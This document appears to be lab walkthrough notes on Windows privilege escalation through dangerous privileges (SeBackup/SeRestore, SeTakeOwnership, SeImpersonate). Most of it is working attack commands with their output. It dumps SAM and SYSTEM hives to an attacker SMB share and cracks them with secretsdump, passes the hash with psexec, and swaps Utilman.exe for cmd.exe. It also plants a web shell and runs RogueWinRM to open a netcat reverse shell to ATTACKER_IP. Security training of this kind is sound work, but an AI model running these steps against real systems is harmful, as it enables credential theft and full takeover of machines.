Abusing dangerous privileges
1 Abusing dangerous privileges 1.1 SeBackup/SeRestore abuse (OR) 1.2 SeTakeOwnership abuse (OR) 1.3 SeImpersonate/SeAssignPrimaryToken abuse
SAM and SYSTEM registry
This hack consists of copying the
SYSTEM registry hives to extract the local Administrator’s password hash.
Check currently assigned privileges:
The current account (
Backup) is part of the “Backup Operators” group, which by default is granted the
SeRestore privileges. Open a command prompt with the “Open as administrator” option to use these privileges.
Check privileges again:
C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Backup the SAM and SYSTEM hashes:
C:\> reg save hklm\system C:\Users\Backup\system.hive The operation completed successfully. C:\> reg save hklm\sam C:\Users\Backup\sam.hive The operation completed successfully.
Copy these files to the attacker machine using SMB or any other available method. For SMB, use impacket’s
smbserver.pyto start a simple SMB server with a network share in the current directory.
# mkdir share # python3 /opt/impacket/examples/smbserver.py -smb2support -username Backup -password <password of Backup> public share
Use the copy command in the Windows machine to transfer both files to the attack machine:
C:\> copy C:\Users\Backup\sam.hive \\<IP address attack machine>\public\ C:\> copy C:\Users\Backup\system.hive \\<IP address attack machine>\public\
Use impacket to retrieve the users’ password hashes:
# python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Use the Administrator’s hash to perform a Pass-the-Hash attack and gain access to the target machine with
# python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<IP address attack machine> ... C:\Windows\system32> whoami nt authority\system
Open a command prompt using “Open as administrator” and check privileges:
C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================== ======== SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen. It is run with
SYSTEMprivileges, so we can gain
SYSTEMprivileges by replacing the original binary with any payload. Because we can take ownership of any file, replacing it is trivial.
Take ownership of
C:\> takeown /f C:\Windows\System32\Utilman.exe SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".
Give the user you are logged in as, full permissions over
C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F processed file: Utilman.exe Successfully processed 1 files; Failed processing 0 files
utilman.exewith a copy of
C:\Windows\System32\> copy cmd.exe utilman.exe 1 file(s) copied.
To trigger utilman, lock the screen from the start button, then click on the “Ease of Access” button, which runs
C:\Windows\system32> whoami nt authority\system
An FTP service running with user
ftp. Without impersonation, if a user logs into the FTP server and tries to
access ftp files, the FTP service would try to access them with its access token rather than Ann’s.
With ftp token like this, we must manually configure specific permissions for each served file/directory. The
ftp user has access to all files. If the FTP service were compromised at some point, the attacker would
immediately gain access to all folders to which the ftp user has access.
If instead, the FTP service’s user has the
SeAssignPrimaryToken privilege, all of this is
simplified a bit, as the FTP service can temporarily grab the access token of the user logging in and use it to
perform any task on their behalf. If we manage to take control of a process with
SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.
Plant a web shell on
http://IP address target/
Use the web shell to check for the assigned privileges of the compromised account and confirm we hold both privileges of interest.
RogueWinRMto the target machine. The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using
SYSTEMprivileges. Port 5985 is typically used for the
WinRMservice, a port that exposes a Powershell console to be used remotely through the network.
Start a netcat listener:
# nc -lvp 4442
Use the web shell to trigger the RogueWinRM exploit:
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
-p parameter specifies the executable to be run by the exploit, which is
nc64.exe in this case. The
parameter is used to pass arguments to the executable. The exploit may take up to 2 minutes to work, so the browser
may appear unresponsive for a bit.
c:\windows\system32\inetsrv>whoami nt authority\system
Privileges are rights that an account has to perform specific system-related tasks. These tasks can be from the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges. Having this power, an adversary can trivially escalate privileges on the system by using many techniques.
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take ownership of the service’s executable.
These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.